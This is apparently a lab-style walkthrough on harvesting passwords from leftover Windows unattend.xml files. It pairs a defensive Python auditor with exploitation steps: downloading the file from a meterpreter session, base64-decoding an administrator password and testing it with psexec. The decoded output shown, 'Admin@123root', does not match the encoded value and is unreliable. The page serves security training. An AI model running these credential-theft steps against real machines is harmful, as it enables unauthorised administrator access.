# Credentials Dumping

#### Passwords Configuration Files <a href="#passwords-configuration-files" id="passwords-configuration-files"></a>

Windows configuration files can contain stored passwords, e.g. the answer files of the *Unattended Windows Setup* utility, which is used to mass-deploy Windows on systems.

* The configuration file can contain specific configurations and user account credentials
* An attacker can find the configuration file left on the target after installation

The utility typically uses the following [files](https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/update-windows-settings-and-scripts-create-your-own-answer-file-sxs?view=windows-11):

`C:\Windows\Panther\Unattend.xml`

`C:\Windows\Panther\Autounattend.xml`

* The stored passwords might be encoded in **`base64`** (easily decodable).
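A defender-side check for the leftover answer files described above, as an added example that is not part of the original page: it parses an answer file and reports which password entries still hold a recoverable value, without returning the value itself. The sample XML, account names and state labels are constructed for illustration; `*SENSITIVE*DATA*DELETED*` is the marker Windows Setup writes when it scrubs a cached answer file.

```python
import re
import xml.etree.ElementTree as ET

# Marker Windows Setup writes in place of a secret it scrubbed from a cached answer file.
SCRUBBED = "*SENSITIVE*DATA*DELETED*"
B64 = re.compile(r"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")

# Constructed sample answer file; account names and values are made up for this example.
SAMPLE = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
 <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
  <UserAccounts>
   <AdministratorPassword><Value>RXhhbXBsZVBhc3Mx</Value><PlainText>false</PlainText></AdministratorPassword>
   <LocalAccounts><LocalAccount><Name>deploy</Name>
    <Password><Value>Summer-2024!</Value><PlainText>true</PlainText></Password>
   </LocalAccount></LocalAccounts></UserAccounts>
  <AutoLogon><Username>kiosk</Username>
   <Password><Value>*SENSITIVE*DATA*DELETED*</Value><PlainText>false</PlainText></Password>
  </AutoLogon>
 </component></settings></unattend>"""

def local(tag):
    return tag.rsplit("}", 1)[-1]  # '{urn:...}Password' -> 'Password'

def child_text(elem, name):
    # Text of the first direct child with this local name, or None if absent
    for child in elem:
        if local(child.tag) == name:
            return (child.text or "").strip()
    return None

def audit_answer_file(xml_text):
    """Return (element, state) for each password entry; the secret itself is never returned."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        value = child_text(elem, "Value")
        if value is None or not local(elem.tag).endswith("Password"):
            continue
        if value in ("", SCRUBBED):
            state = "no secret present"
        elif (child_text(elem, "PlainText") or "").lower() == "true":
            state = "plaintext"
        else:  # base64 is an encoding, not encryption, so it counts as exposed
            state = "base64 (recoverable)" if B64.fullmatch(value) else "unrecognised encoding"
        findings.append((local(elem.tag), state))
    return findings

if __name__ == "__main__":
    for name, state in audit_answer_file(SAMPLE):
        print(f"{name}: {state}")
```

Any entry reported as `plaintext` or `base64 (recoverable)` means the file should be deleted or scrubbed and the affected account's password rotated.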

## Exploitation

After getting a meterpreter session or shell session, follow this technique:

* Manually search for the **`unattend.xml`** file; it should be inside
  * `C:\Windows\Panther`

```
cd C:\\Windows\\Panther
dir
download unattend.xml
```


* In a new terminal tab

```
cat unattend.xml
```


#### Get Access <a href="#get-access" id="get-access"></a>

* The base64-encoded password configured for the `administrator` user is **`QWRtaW5AMTIz`**
  * Save it to a new file
  * Decode it using the `base64` tool

```
nano password.txt
# paste the password, save and exit the file

base64 -d password.txt 
	Admin@123root
```


* Test the `administrator`:`Admin@123root` credentials with the `psexec` tool

```
psexec.py administrator@10.4.19.9
```

You have gained access to the administrator account.
